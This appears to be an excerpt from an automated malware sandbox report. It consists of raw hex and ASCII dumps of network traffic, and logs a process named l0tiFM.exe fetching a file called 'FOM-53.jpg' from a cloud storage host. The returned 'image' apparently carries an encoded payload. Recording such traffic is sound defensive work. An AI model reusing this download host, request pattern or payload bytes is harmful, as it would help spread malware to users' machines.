                                                                                                              2025-01-11 03:43:11 UTC4096INData Raw: 76 3b 9a 2f a5 d0 56 ab c4 f4 cc a1 12 27 f0 11 4c 94 ef 12 31 58 23 3c c6 b1 ec ba 45 96 46 46 f6 24 8e 89 dd b1 38 89 66 c2 79 d2 b3 b5 25 19 80 c7 28 f9 85 7d 8d 49 94 e3 d2 8b 92 cb f1 27 a5 1e 65 9a 0d 24 21 88 82 f8 05 e3 7e 27 2d b8 d1 e3 32 71 8d ad 95 6c 46 1c 3b d8 e9 eb 13 24 94 d8 16 f1 f4 38 83 ee f5 d4 be 1d b9 53 fa 70 d4 ee cc a4 15 79 67 9f 06 cb 07 19 b1 3e 7c b5 65 18 68 0a c6 22 13 ed 4c ea 2c ff 32 4f 94 a2 b5 94 ef ee d9 86 62 ff a7 83 cf f0 ea c9 44 53 4d 8a 6c 9b cc 06 f2 e6 13 fa 3c 21 8d f7 9f 32 cd 95 50 9a 71 01 f0 c6 0b dd 04 f0 5b 24 6b c6 6c 7f 35 67 68 4a 5b 2d df 32 af ed a0 7b 95 d7 43 07 d1 fb 17 0b 43 df 87 62 69 46 68 e0 eb 47 28 a3 81 aa 32 08 bc 21 f8 7a 14 93 1b c6 2c 1b 7d c3 10 5b d1 12 f7 56 c2 1c 7c e4 85 f3 c4
                                                                                                              Data Ascii: v;/V'L1X#<EFF$8fy%(}I'e$!~'-2qlF;$8Spyg>|eh"L,2ObDSMl<!2Pq[$kl5ghJ[-2{CCbiFhG(2!z,}[V|
                                                                                                              2025-01-11 03:43:11 UTC4096INData Raw: 77 a8 c4 d9 fd a7 56 28 73 5f 0f 7f 3b 00 66 82 36 d4 2f 7b 1c 50 0d 90 42 5e 0e b6 3d dc 83 58 6a 35 e0 f2 6f 3a a8 d5 ee 37 cd 99 ee 9c 06 8c d0 87 05 97 4d 50 36 97 03 25 ea e1 52 3c bb 3e 25 ca 4d a1 9a de 65 27 6e 38 2d 65 92 e5 96 84 ff 4a 69 e4 8b 0a 8b 94 f6 d4 7c 01 80 fb e0 03 ea 19 32 5d 29 28 3c ad 5d b5 fc 74 7f 9a bf fa 5f aa b3 08 b5 0d 57 25 c0 b8 67 cb 8c bc e8 48 4a 02 a5 57 78 65 40 ad c1 5a 91 f1 85 ed 06 07 63 d1 27 0a 48 fc b3 b0 df 6f a6 ee 6a 10 26 82 2e 2b 90 38 ca 76 a6 a6 73 fc a4 31 18 8b bd 07 98 fc 6b e9 ca cc 83 78 6a 94 92 3f 5d 02 57 0e 0c a9 36 a3 64 c6 b8 98 a5 03 28 be 9c a1 91 80 1b b7 e8 6f 73 1a dc 78 f5 54 c0 09 e3 53 1a 57 f1 88 1f f9 f7 41 dd c4 eb 74 19 ad 09 5d 4b c5 25 7f a9 10 ba 2e 1a 5c 79 23 15 00 2d cb 6f
                                                                                                              Data Ascii: wV(s_;f6/{PB^=Xj5o:7MP6%R<>%Me'n8-eJi|2])(<]t_W%gHJWxe@Zc'Hoj&.+8vs1kxj?]W6d(osxTSWAt]K%.\y#-o
                                                                                                              2025-01-11 03:43:11 UTC4096INData Raw: f5 f5 f3 fb ff fd f3 f5 f7 f5 f3 eb ef ed d3 d5 d7 d5 d3 dd bf a7 d3 d5 d3 d5 d3 2d 2f 2d 33 37 37 75 32 3d 3f 2d 33 35 27 35 33 2d 2f 3d 53 55 47 55 53 5d 5f 5d 53 45 57 55 53 11 b2 50 73 3f 77 75 73 f1 8d 4d 73 a9 77 75 73 6d 3f 17 53 b5 56 55 53 5d 5f 5d 53 55 57 55 53 2d 2f 2d 33 35 37 35 33 3d 0f 47 33 15 2c 35 33 2d 2f 2d d3 d5 d7 d5 d3 dd df dd d3 d5 d7 d5 d3 ed ef ed f3 f5 f7 f5 f3 fd ff fd f3 f5 f7 f5 f3 4d c9 97 d3 95 d7 d5 d3 dd df dd d3 d5 d7 d5 d3 2d 1f 00 33 51 37 35 33 3d 3f 3d 33 35 37 35 33 2d 2f 2d 53 55 57 55 53 5d 5f 5d 53 55 57 55 53 43 1b 08 0b 01 77 75 73 1e cd 7c 73 75 67 75 73 6d 6f 6d 53 55 57 55 53 5d 5f 5d 53 55 57 55 53 2d 2f 2d 33 15 37 35 53 13 4d 59 52 41 56 35 33 e5 a6 2d d3 d5 07 d4 d3 dd df dd d3 d5 d7 d5 d3 ed ef ed f3
                                                                                                              Data Ascii: -/-377u2=?-35'53-/=SUGUS]_]SEWUSPs?wusMswusm?SVUS]_]SUWUS-/-35753=G3,53-/-M-3Q753=?=35753-/-SUWUS]_]SUWUSCwus|sugusmomSUWUS]_]SUWUS-/-375SMYRAV53-
                                                                                                              2025-01-11 03:43:11 UTC4096INData Raw: d1 7d e2 3a fb d9 7f 2d 5c 08 7e 89 cb e9 3a 78 19 d3 d3 54 a8 dd 3b c0 68 9c d3 da f6 a0 3f b8 09 85 13 9c b2 89 02 f5 bb 84 84 22 99 a1 5c eb db e4 e4 52 d7 a8 84 57 57 3d d3 53 dd 2c 15 fe 48 f8 17 59 7b 94 02 a5 74 75 f2 ab 6b 6d 53 55 5c 97 a4 8d b7 85 fd 1e 57 33 82 c4 fc f5 5b b3 98 02 7d b4 7b 18 33 b8 53 11 3f c4 e7 e4 99 d5 df 7a 12 6b f1 4b ab 5b 8f 5c 2e 0b c5 75 fb 0d d3 04 7a 6d a5 1d 7f b1 af 41 46 fd 97 72 44 70 9c 6c f0 98 c6 38 c7 3a 4f 9d 67 53 5d 8b 18 45 fa 27 78 f9 2c e7 bf e3 1a 15 03 e6 d9 54 24 d6 03 bf c8 c3 24 e4 ff 0d e1 62 93 bb 32 d3 1d e0 a9 69 56 22 dc 79 04 9f f6 79 91 f4 ce a4 27 3e 2c 7c 5a 6b f3 21 34 52 4f 12 6e 97 99 0b 32 20 48 ad 50 69 a7 06 6a 8b 46 53 7e 44 e7 8d 63 9d 43 d3 36 f2 39 ef 4b 76 db 20 c3 a9 cd f4 6d
                                                                                                              Data Ascii: }:-\~:xT;h?"\RWW=S,HY{tukmSU\W3[}{3S?zkK[\.uzmAFrDpl8:OgS]E'x,T$$b2iV"yy'>,|Zk!4ROn2 HPijFS~DcC69Kv m
                                                                                                              2025-01-11 03:43:11 UTC4096INData Raw: 5c f2 f3 f2 cb a8 4e 59 1d d2 ce 66 43 81 7b ff 67 50 14 99 fb dd 4e 2d 27 1b 3b 32 e1 3d 33 3a 03 dd 71 52 2f 3d b3 f7 09 f2 37 09 35 05 d2 00 d7 a7 6e a2 5b 79 ad 9f 96 b5 c6 ed 9d 66 b3 39 53 74 34 ad bd bc 93 b3 fe 71 77 93 a5 84 18 86 55 55 ba d3 80 5c 53 d8 33 71 4b ee a2 49 17 31 de 70 f5 2e 3f d4 1a 6a 27 35 da f8 c9 29 d3 3d 14 a5 d5 dd 18 d9 f7 74 d2 59 bd 8b 6e 18 e6 02 30 b1 d7 f9 6b fa e2 61 91 0a 36 8b dc 30 3b 0f bb de d3 87 8c 44 53 a3 22 0d aa a3 e3 13 d4 68 4b 97 1e 19 a2 5f ef 4f 5c 9c 5f 83 e2 ed 0e 6b 27 d3 18 e0 1f 57 f6 99 4e 8f 66 e4 e9 d6 c4 39 a5 10 98 95 71 d9 7b bc 71 9c 9c 89 c1 9c 58 3a b4 2b 66 f8 3c 84 df 79 ba 43 96 ad af 4f c6 9e 70 72 72 50 0a 98 50 ac 17 9d c0 f8 94 89 96 25 87 df 01 09 25 05 6d 3f 30 e0 76 8e 06 07 6c
                                                                                                              Data Ascii: \NYfC{gPN-';2=3:qR/=75n[yf9St4qwUU\S3qKI1p.?j'5)=tYn0ka60;DS"hK_O\_k'WNf9q{qX:+f<yCOprrPP%%m?0vl
                                                                                                              2025-01-11 03:43:11 UTC4096INData Raw: 20 fb 64 56 1a 91 6e df 20 2c 89 77 e2 e2 05 39 f2 8e f5 00 2d 52 de 02 01 04 ca 1a ce 6a d2 47 a1 f6 d0 fe 59 5f 7b be ab de 7e b5 7b 3a bc 5c 60 b4 14 c4 40 8e 4f 1b d3 50 30 ca 88 05 19 87 a6 6c 44 9c 38 ec 39 0e 59 7b 02 e0 f1 72 5e f5 ad 67 1a cd 99 59 ab ba 5e 62 b2 6a a6 96 6c 3f b0 7f 47 31 af f9 8d b1 e6 2c 04 cc 68 ac 20 ea 27 da fc 3a c9 29 c2 2d 03 bc 6d b2 50 da 12 b2 4e b6 81 da 21 4d f8 86 bb 30 9c c3 3a 42 00 c7 75 98 22 d5 e2 ed f7 ca c4 d5 09 a4 4e 82 04 d4 70 9c 5e b4 e3 6c a8 46 17 b5 25 7a 7b b5 5c 61 52 62 b2 1a fe 80 42 8b a0 8b af 69 84 9a 79 9f 8b 45 e0 9d 05 e1 0c 2d e5 1f 50 b8 e2 04 38 e7 df 32 37 b0 48 b1 af 82 c3 27 a8 d2 aa e1 62 df e9 b2 a2 12 f5 be 96 d6 5d 5d 4d 27 3a 1a 32 92 06 ad 9a 5b a6 db 14 ee 80 13 e1 a7 67 c5 71
                                                                                                              Data Ascii: dVn ,w9-RjGY_{~{:\`@OP0lD89Y{r^gY^bjl?G1,h ':)-mPN!M0:Bu"Np^lF%z{\aRbBiyE-P827H'b]]M':2[gq
                                                                                                              2025-01-11 03:43:11 UTC4096INData Raw: 11 ac 16 c6 07 c4 9d 58 cd bb f4 f0 2b 3a 16 5a da 8a 33 81 27 42 b4 e4 1c b3 44 f3 eb 30 85 ed 13 a0 b4 46 35 68 06 83 59 2b bf 9b 83 03 97 31 12 15 bc 78 b1 76 b9 71 21 32 04 6b 81 a4 83 32 6f d6 69 98 27 df ea f9 0c 4f 4b 67 2f 4b 06 67 44 04 ef 78 60 0a 1a 43 f5 40 32 c2 0d 65 17 e5 08 cc a8 23 c1 d9 dd 70 6e 88 fc 7f 8d 81 6d 3c 8a c0 7c 8f 3d 55 13 79 ca fa 4f 7d 9f 59 1f ab 7a 58 3c b6 7e 0a 9f 2b 23 7e 6a 96 9f 38 e0 63 e5 5a 1a 32 5b b4 2a 2e c8 4b fc 30 60 d4 a2 2b 2b bb 40 ab 29 c3 47 5a c5 72 2a 67 22 60 fd 3a 2c 8c 49 94 ad 10 8c f4 1c aa 13 b2 44 63 6e 0d 2e 1c 0e 75 75 75 69 83 57 e4 6c 56 e5 7f 18 20 b8 d1 37 88 2a 1b 65 fe 57 b8 31 b5 b2 3c d8 01 d7 18 1c 20 44 7d d7 1c 11 ca 50 b1 34 77 e7 17 39 01 6f c0 e8 d3 94 88 53 e8 54 bc 80 c3 59
                                                                                                              Data Ascii: X+:Z3'BD0F5hY+1xvq!2k2oi'OKg/KgDx`C@2e#pnm<|=UyO}YzX<~+#~j8cZ2[*.K0`++@)GZr*g"`:,IDcn.uuuiWlV 7*eW1< D}P4w9oSTY
                                                                                                              2025-01-11 03:43:11 UTC4096INData Raw: ef cc 4c d0 d3 09 06 21 8c 0a e4 fd 58 ee 29 db 81 82 6d c1 a4 30 bc c1 88 36 cd ab 62 b5 32 ab fb fb ec 20 e3 1f be d1 52 c7 7b bf 58 54 f3 43 f2 8d 0e 8b f7 13 10 a0 bb 4f ee a1 7a 27 8f 37 90 b6 93 e7 12 94 df b3 75 98 ed 5e 3f 26 b3 6b dc e4 4b ac 06 65 59 29 76 21 46 e6 59 50 ec 8d 23 41 76 61 bd b4 2a c0 a1 d0 00 7d 85 b9 46 a9 73 14 b0 38 5b 50 8e c5 4d 41 4e b1 33 ec 52 c8 9b 60 d6 75 f5 94 ee 23 f4 6f f6 e6 d2 e9 4d 56 be d7 e4 8f 26 6e aa 79 e5 e6 5e 13 6c 17 b6 e2 e2 11 f5 fe 7e 0b 44 9b c6 aa 3a f9 70 8c 7b bc 07 41 a6 db 37 9c 40 ed 30 d4 63 08 f2 34 c3 bc 19 00 1b 0e a0 05 0a d9 18 ea e0 fd 6c 8a 5d c5 2d 44 59 87 c8 6a f8 9f 94 42 5d b7 0d 78 f1 3b 58 f0 58 03 2c 94 05 87 6d 14 59 c3 c8 52 68 6d 20 54 3c df df dd d3 b3 5e da 3a d6 ef ef f3
                                                                                                              Data Ascii: L!X)m06b2 R{XTCOz'7u^?&kKeY)v!FYP#Ava*}Fs8[PMAN3R`u#oMV&ny^l~D:p{A7@0c4l]-DYjB]x;XX,mYRhm T<^:
                                                                                                              2025-01-11 03:43:11 UTC4096INData Raw: 15 03 58 89 56 b4 b6 a2 ad 03 9c f1 67 d1 75 f3 e8 19 38 39 86 89 50 71 f6 9c 55 6e f0 3c 79 b6 4b a6 36 b9 b4 a2 ab 24 ae 39 77 96 dd 86 d0 fd 7d 97 cb 0d f0 c5 e3 02 f9 c1 52 24 d9 92 d5 0f ce ba 02 8d 60 9d a4 7e 46 0c f6 07 7e 6e 99 9f b7 49 61 ff 7c c2 1d c4 45 e2 10 ab 9d 5d f3 48 c7 32 f2 49 bd 7e 2c f3 14 b8 55 84 3b b6 cd f2 2c a2 4e c8 2f 6a 5f 90 af 64 33 93 34 22 de 67 0c 00 0a 07 58 6d 1d 91 a5 e8 77 57 3e 92 ad 64 db 25 db 5a a7 9e fb ee 37 1e bf 9f 1c 20 8f 58 83 8e 9c 9d 1a 84 f4 2f e8 b6 e9 fc 5c 14 cf 3d a8 20 c1 36 73 8b 6d ad fa 19 32 a5 19 e7 34 c8 51 2a b2 c7 6f 71 16 6b 1a c9 12 87 4a 5b 13 27 7e 0c 5d 42 3e 1f df 6d a6 94 82 5a 53 5e fd 07 49 a4 e3 fa f2 49 de ae 8b 50 62 d9 cf c2 ba 82 06 00 8f 34 6e 19 e8 d9 e4 90 5c e0 85 6f a3
                                                                                                              Data Ascii: XVgu89PqUn<yK6$9w}R$`~F~nIa|E]H2I~,U;,N/j_d34"gXmwW>d%Z7 X/\= 6sm24Q*oqkJ['~]B>mZS^IIPb4n\o


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              12192.168.2.849942118.178.60.94434064C:\Users\user\Documents\l0tiFM.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-11 03:43:22 UTC115OUTGET /FOM-53.jpg HTTP/1.1
                                                                                                              User-Agent: GetData
                                                                                                              Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                                                                              Cache-Control: no-cache
                                                                                                              2025-01-11 03:43:22 UTC546INHTTP/1.1 200 OK
                                                                                                              Server: AliyunOSS
                                                                                                              Date: Sat, 11 Jan 2025 03:43:22 GMT
                                                                                                              Content-Type: image/jpeg
                                                                                                              Content-Length: 366410
                                                                                                              Connection: close
                                                                                                              x-oss-request-id: 6781E8DA2C1E9333356A3851
                                                                                                              Accept-Ranges: bytes
                                                                                                              ETag: "DA1D5EB665D3AAD523BE59415E6449ED"
                                                                                                              Last-Modified: Tue, 22 Oct 2024 14:47:51 GMT
                                                                                                              x-oss-object-type: Normal
                                                                                                              x-oss-hash-crc64ecma: 5641369857548672686
                                                                                                              x-oss-storage-class: Standard
                                                                                                              x-oss-ec: 0048-00000105
                                                                                                              Content-Disposition: attachment
                                                                                                              x-oss-force-download: true
                                                                                                              Content-MD5: 2h1etmXTqtUjvllBXmRJ7Q==
                                                                                                              x-oss-server-time: 3
                                                                                                              2025-01-11 03:43:22 UTC3550INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08
                                                                                                              Data Ascii: JFIFZExifMM*JQQ%Q%CC
                                                                                                              2025-01-11 03:43:22 UTC4096INData Raw: 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 60 60
                                                                                                              Data Ascii: ```````````````````````````````````````````````````````````````
                                                                                                              2025-01-11 03:43:22 UTC4096INData Raw: 60 60 eb 25 68 30 9f 75 d0 14 62 70 e9 25 84 e3 1d 84 60 15 67 52 a0 89 a9 60 60 60 06 67 e5 4c a2 a0 c6 2b ed ac f1 5f b5 0c d4 a2 b0 c6 29 e5 4e 2b f5 44 2b e2 ac 2b a8 2b b1 29 f5 10 8a f0 6d a5 0c b0 6b ad 34 6b b1 a8 b2 1f f5 2c 94 e2 f0 63 18 1f 95 e7 d2 20 09 68 e0 e0 e0 67 e5 5c a1 a0 a0 a0 ca a4 2d e5 5c f0 ca a8 c8 5f 5f a0 a0 2b ed 74 2b f1 e8 f2 5f b5 08 d4 a2 70 e5 a0 15 59 a7 25 b8 61 60 60 60 a7 25 bc 40 df 62 60 a7 25 80 e8 73 60 60 0a 60 0a 60 ed 25 48 f0 ca a0 ca a0 ca ac 2d ed 78 f1 c8 a4 a0 a0 38 2b f5 74 2b e2 e8 f0 5f b5 00 d4 a2 b0 2b ed 34 26 a1 b3 e1 8a e0 8a e0 8a e0 6b b5 34 b2 88 69 f7 e0 f0 8a e0 8a e0 08 da 10 e0 e0 63 24 fc 2b ed 74 29 e1 e4 10 a1 2b 45 fd 62 a8 a0 f5 2b 4c 18 b8 6a a0 a0 48 9a a7 a1 a0 f6 f7 2b e5 a8 e9 e5
                                                                                                              Data Ascii: ``%h0ubp%`gR```gL+_)N+D+++)mk4k,c hg\-\__+t+_pY%a```%@b`%s````%H-x8+t+_+4&k4ic$+t)+Eb+LjH+
                                                                                                              2025-01-11 03:43:22 UTC4096INData Raw: 9d 9f 9f 31 ed f5 f4 9e 9f 9f 32 88 1d 9d 60 60 e3 a4 70 ed e5 f4 9e 9f 9f 30 ed ed 10 5d 5f 5f f1 5f b5 30 d2 a2 b0 ca a0 c8 20 a0 a0 a0 ca a2 ca a0 ca a2 c8 a0 a0 a0 e0 c8 a0 4c a2 f0 1f f5 74 92 e2 f0 69 65 84 1d 1f 1f 63 5d 84 1d 1f 1f 1f 95 e7 d3 20 09 0a e0 e0 e0 8a e0 6d 35 cc 5d 5f 5f f2 2b e5 a8 f0 48 06 5c a0 a0 23 64 a4 2b ed ac 8b 68 23 49 a1 f1 2b f5 a8 f2 48 f1 9c 60 60 e3 a4 64 eb 2d 68 ed 34 61 61 32 eb e5 04 9d 9f 9f 30 9f 75 f8 12 62 70 eb ed 04 9d 5f 5f f1 5f b5 44 d2 a2 b0 c8 54 a1 a0 a0 5f b5 6c d2 a2 b0 ca a1 c8 8c 4c a2 b0 48 61 5c 5f 5f 63 24 e8 8a e0 88 b8 0c e2 f0 08 dd 1b e0 e0 63 24 e8 63 18 1f 94 d0 8a e0 8a e0 8a e0 6d 75 18 5e 5f 5f f2 c8 24 4c a2 b0 ca a0 5f b5 a0 d3 a2 b0 ca a0 01 68 ec a5 b0 f0 5f b5 3c d2 a2 b0 ca 60 9f
                                                                                                              Data Ascii: 12``p0]___0 Ltiec] m5]__+H\#d+h#I+H``d-h4aa20ubp___DT_lLHa\__c$c$cmu^__$L_h_<`
                                                                                                              2025-01-11 03:43:22 UTC4096INData Raw: 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 44 45 46 47 48 49 4e 4e 4e 4a 4b 4e 8e 8e 8c 8d f5 2b 4c 21 4c 18 a2 a0 a0 29 2d e8 5d 5f 5f c8 ac 4e a2 b0 48 3e a3 a0 a0 23 64 a4 8a e0 88 f4 0e e2 f0 08 d5 0d 1f 1f 63 24 e8 8a e0 88 d0 0e e2 f0 08 c6 0d 1f 1f 63 24 e8 88 08 a3 a0 a0 5f b5 6c d2 a2 b0 c8 e8 4e a2 b0 5f b5 20 d2 a2 b0 c8 c0 4e a2 b0 5f b5 20 d2 a2 b0 c8 88 63 60 60 9f 75 ac 12 62 70 08 64 61 60 60 ed e5 98 9e 9f 9f 30 0a 60 9f 75 e4 12 62 70 a6 e5 24 5e 5f 5f eb 66 25 25 5e 5f 5f e5 66 25 26 5e 5f 5f f2 66 25 27 5e 5f 5f ee 66 25 28 5e 5f 5f a5 26 65 69 1e 1f 1f ac 26 65 6a 1e 1f 1f d3 26 65 6b 1e 1f 1f d2 26 65 6c 1e 1f 1f ce 26 65 6d 5e 5f 5f c4 66 25 2e 5e 5f 5f cc 66 25 2f 5e 5f 5f cc 66 25 30 5e 5f 5f a0 66 25 d4 5e 5f 5f e7 a6 e5
                                                                                                              Data Ascii: NNNNNNNNNNNNNNNNNDEFGHINNNJKN+L!L)-]__NH>#dc$c$_lN_ N_ c``ubpda``0`ubp$^__f%%^__f%&^__f%'^__f%(^__&ei&ej&ek&el&em^__f%.^__f%/^__f%0^__f%^__
                                                                                                              2025-01-11 03:43:22 UTC4096INData Raw: 90 12 62 70 d8 61 60 60 60 8b 62 8b 80 eb 85 3d a3 35 eb 8c e3 8c 08 37 eb 25 68 e9 25 38 66 e5 3c a0 19 b8 a0 a0 a0 93 60 2d dd 3d 53 0b c6 0b 0a ca c4 2b ed 38 f1 2d f5 3c f2 48 92 2f e0 e0 63 24 ec 6d a5 7c b0 6b ed 28 09 e2 f0 b1 88 78 a5 e5 f0 6b b5 78 63 22 84 b2 08 df 1f 5f 5f 23 64 b0 93 60 ff 2b 45 fd 62 a4 a0 f5 2b 4c ca a0 01 68 49 a2 b0 f0 c8 38 e5 a5 b0 2b ed 68 31 88 7a 9f 9f 9f e3 a4 70 53 a0 3d a2 64 60 35 eb 8c 0a 60 c1 60 60 60 70 30 08 60 60 60 70 2b ed a8 f1 48 58 5e 5f 5f 23 64 b0 93 60 fd 62 a4 a0 f5 2b 4c 21 4c 80 a4 a0 a0 f7 c8 cc 4f a2 f0 1f f5 68 92 e2 f0 69 a5 18 d3 20 86 41 6a dd e5 f0 65 20 95 e5 09 a7 e1 e0 e0 d3 29 86 6b ed 2a 9d a5 b0 29 ed 5c 2b f5 5c 61 42 aa 29 f5 50 ca a0 c8 20 a0 a0 a0 ca a4 ca a0 ca a2 c8 a0 a0 60 20
                                                                                                              Data Ascii: bpa```b=57%h%8f<`-=S+8-<H/c$m|k(xkxc"__#d`+Eb+LhI8+h1zpS=d`5````p0```p+HX^__#d`b+L!LOhi Aje )k*)\+\aB)P `
                                                                                                              2025-01-11 03:43:22 UTC4096INData Raw: 60 60 eb 25 68 30 ed ed 40 9d 9f 9f 31 88 00 df 60 60 e3 a4 6c a6 e5 f8 9e 9f 9f 60 d9 f9 a0 a0 a0 93 60 2d 1d 39 5e 5f 5f 53 0b c6 0b 0a ca a0 ca a0 ca a2 ca a0 ca a1 c8 a0 a0 a0 e0 6d 75 cc 1e 1f 1f b2 1f f5 74 92 e2 f0 69 65 70 1e 1f 1f 63 5d 70 1e 1f 1f 1f 95 e7 d3 20 09 11 a0 a0 a0 ca a0 2d 25 34 5e 5f 5f f0 2b ed ac 21 49 d0 a1 a0 a0 f1 2b f5 a8 21 62 d0 a1 a0 a0 f2 eb e5 f0 9e 9f 9f 30 9f 75 f8 12 62 70 e5 a0 15 67 53 a0 89 dc 60 60 60 eb ed f0 9e 9f 9f 31 9f b5 a4 ed a5 b0 2d 35 88 5d 5f 5f f2 48 c4 6c a0 a0 23 64 a4 25 60 d4 85 2d 25 88 5d 5f 5f f0 2d 6d cc 1e 1f 1f b1 88 6c 11 e2 f0 6d 75 78 1e 1f 1f b2 1f f5 b4 ad e5 f0 63 24 f0 0b f4 6d 65 cc 5e 5f 5f f0 2d 2d 38 5e 5f 5f f1 5f b5 68 d2 a2 b0 2b 35 84 5d 5f 5f 29 35 bc 5d 5f 5f 23 1d bc 9d 9f
                                                                                                              Data Ascii: ``%h0@1``l``-9^__Smutiepc]p -%4^__+!I+!b0ubpgS```1-5]__Hl#d%`-%]__-mlmuxc$me^__--8^___h+5]__)5]__#
                                                                                                              2025-01-11 03:43:22 UTC4096INData Raw: ac ac 35 eb 8c 53 a0 c0 4c c6 65 70 e3 80 61 e5 a0 15 6f ea 6d 4c c6 65 70 e0 a9 61 e8 ad 8c 06 a5 b0 fd 63 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c f5 2b 4c f1 29 ed 5c 2b e5 ac 2a e8 6b b5 1c 68 ea 8a e0 6b ad 1c 08 f5 e2 e0 e0 6b a5 e8 b0 6b ad 1c 08 a9 e1 e0 e0 6b a5 1c 6b 45 fd 62 a8 a0 f5 2b 4c f1 29 ed 5c ca a1 2b ed 5c 48 4f a1 a0 a0 2b 45 fd 63 6c 6c 6c 6c 6c 6c ac ac ac ac ac 35 eb 8c 31 e9 2d 9c ea 25 68 30 0a 61 eb 2d 9c 88 eb 60 60 60 eb 85 3d a2 64 60 6c 6c 6c 6c 6c f5 2b 4c f1 29 ed 5c 2b e5 5c 2b e8 a8 9b ed a8 d7 a5 48 c2 c9 a1 a0 2b ed 5c 48 f1 e1 e0 e0 6b b5 1c 6b a2 e4 e3 a5 e8 6b 05 bd 22 e4 e0 2c 2c b5 6b 0c 63 0c e8 69 ad 1c 6b a5 5c 23 d8 a4 a0 d5 aa 48 c9 a1 a0 a0 29 e5 58 4b a9 2b ed 5c 2b f1 a4 29 f5 58 2b e5 58 2b 45 fd a3 ac
                                                                                                              Data Ascii: 5SLepaomLepacllllllllllllll+L)\+*khkkkkkEb+L)\+\HO+Ecllllll51-%h0a-```=d`lllll+L)\+\+H+\Hkkk",,kcik\#H)XK+\+)X+X+E
                                                                                                              2025-01-11 03:43:22 UTC4096INData Raw: e3 98 1d 15 6a a7 65 0c 94 62 70 60 60 60 60 e3 5d 0c 94 62 70 60 14 41 08 12 74 60 60 5f b5 6c d2 a2 b0 2b 2d 44 5e 5f 5f 48 7c 5c 5f 5f 2b 2d 44 5e 5f 5f 48 ff 5d 5f 5f 2b ed 54 c4 69 ed e0 e0 e0 e0 bf be bb 6b 05 bd 22 e8 e0 2c 2c 2c 2c 2c 2c b5 6b 0c b1 69 ad 1c 6b ad 1c 08 23 5c 5f 5f 2b e5 a8 23 40 a1 25 60 d4 ac 2b ed 5c f1 48 53 3e a0 a0 23 64 a4 2b e5 5c 2b 45 fd a2 64 60 ac ac 35 eb 8c 88 67 60 60 60 88 71 60 60 60 3d a3 35 eb 8c d9 ad 2c 65 70 88 75 3c 61 a0 fd 63 f5 2b 4c c8 f0 d7 a0 b0 48 10 0d a0 a0 23 64 a4 fd 63 f5 2b 4c 19 6d ec a5 b0 48 d3 fd e1 e0 bd 23 b5 6b 0c 08 e7 e0 e0 e0 08 f1 e0 e0 e0 bd 23 b5 6b 0c 59 2c ac e5 f0 08 30 89 e1 e0 fd 63 f5 2b 4c c8 2f d7 a0 b0 48 d1 0d a0 a0 23 64 a4 fd 63 f5 2b 4c 19 6c ec a5 b0 48 90 cb a1 60 3d
                                                                                                              Data Ascii: jebp````]bp`At``_l+-D^__H|\__+-D^__H]__+Tik",,,,,,kik#\__+#@%`+\HS>#d+\+Ed`5g```q```=5,epu<ac+LH#dc+LmH#k#kY,0c+L/H#dc+LlH`=
